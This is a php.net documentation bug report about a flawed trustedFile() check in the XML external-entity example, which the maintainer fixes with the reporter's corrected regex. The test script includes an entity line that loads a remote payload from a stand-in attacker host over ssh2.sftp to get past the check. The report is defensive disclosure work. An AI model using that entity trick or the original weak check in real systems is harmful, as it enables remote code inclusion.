php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Doc Bug #68368 Insecure example
Submitted: 2014-11-06 23:33 UTC Modified: 2014-11-07 10:59 UTC
From: clicky at erebot dot net Assigned: aharvey (profile)
Status: Closed Package: Documentation problem
PHP Version: Irrelevant OS: irrelevant
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: clicky at erebot dot net
New email:
PHP Version: OS:

 

 [2014-11-06 23:33 UTC] clicky at erebot dot net
Description:
------------
---
From manual page: http://www.php.net/example.xml-external-entity
---
function trustedFile($file) 
{
    // only trust local files owned by ourselves
    if (!preg_match("@^([a-z]+)\:\/\/@i", $file) 
        && fileowner($file) == getmyuid()) {
            return true;
    }
    return false;
}

---

This function is not secure as it does not handle schemes containing special characters (digits, '+', '.' or '-') in them. In some circumstances, PHP may define URL wrappers with such names, eg. when the SSH2 extension is installed.

Test script:
---------------
One way to pass the trustedFile() checks is to load a remote file using SFTP by replacing the following line in xmltest.xml :
<!ENTITY systemEntity SYSTEM "xmltest2.xml">

with:
<!ENTITY systemEntity SYSTEM "ssh2.sftp://user:pass@evil.example.com/payload.xml">

Also, since the ssh2.sftp wrapper supports stat() calls, it is possible to craft a remote file such that its owner UID matches the current script's owner UID.

Based on RFC 3986, this issue can be trivially fixed by changing the regex to:
"@^([a-z][a-z0-9+.-]*)\:\/\/@i"

Expected result:
----------------
Even though the code given on that page is only an example, it could be interpreted as guidance towards secure parsing of XML documents. Plus, the code specifically says that only local files are "trusted".

I would thus expect it to reject attempts to include and execute code from remote resources.

Actual result:
--------------
<CHAPTER>
 <TITLE>Title &plainEntity;</TITLE>
 <PARA>
  <INFORMALTABLE>
   <TGROUP COLS="3">
    <TBODY>
     <ROW><ENTRY>a1</ENTRY><ENTRY MOREROWS="1">b1</ENTRY><ENTRY>c1</ENTRY></ROW>
     <ROW><ENTRY>a2</ENTRY><ENTRY>c2</ENTRY></ROW>
     <ROW><ENTRY>a3</ENTRY><ENTRY>b3</ENTRY><ENTRY>c3</ENTRY></ROW>
    </TBODY>
   </TGROUP>
  </INFORMALTABLE>
 </PARA>
 <FOO>
   <ELEMENT ATTRIB="value"></ELEMENT>
   &testEnt;
   This is some more PHP code being executed.
</FOO>
 <SECTION ID="about">
  <TITLE>About this Document</TITLE>
  <PARA>
   <!-- this is a comment -->
   Hi!  This is PHP version 5.4.33
  </PARA>
 </SECTION>
</CHAPTER>XML error: Invalid URI at line 28

(note: the "XML error" at the end is triggered by the use of a path to a non-existent DTD in xmltest.xml on line 2 [/just/a/test.dtd] and is not related to this bug)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2014-11-07 10:59 UTC] aharvey@php.net
Automatic comment from SVN on behalf of aharvey
Revision: http://svn.php.net/viewvc/?view=revision&amp;revision=335165
Log: Change the XML parser external entity example, as suggested by clicky.

Fixes doc bug #68368 (Insecure example).
 [2014-11-07 10:59 UTC] aharvey@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: aharvey
 [2014-11-07 10:59 UTC] aharvey@php.net
This bug has been fixed in the documentation's XML sources. Since the
online and downloadable versions of the documentation need some time
to get updated, we would like to ask you to be a bit patient.

Thank you for the report, and for helping us make our documentation better.

Thank you very much! I've changed it as you suggest.
 
PHP Copyright © 2001-2026 The PHP Group
All rights reserved.
Last updated: Wed Oct 07 11:00:02 2026 UTC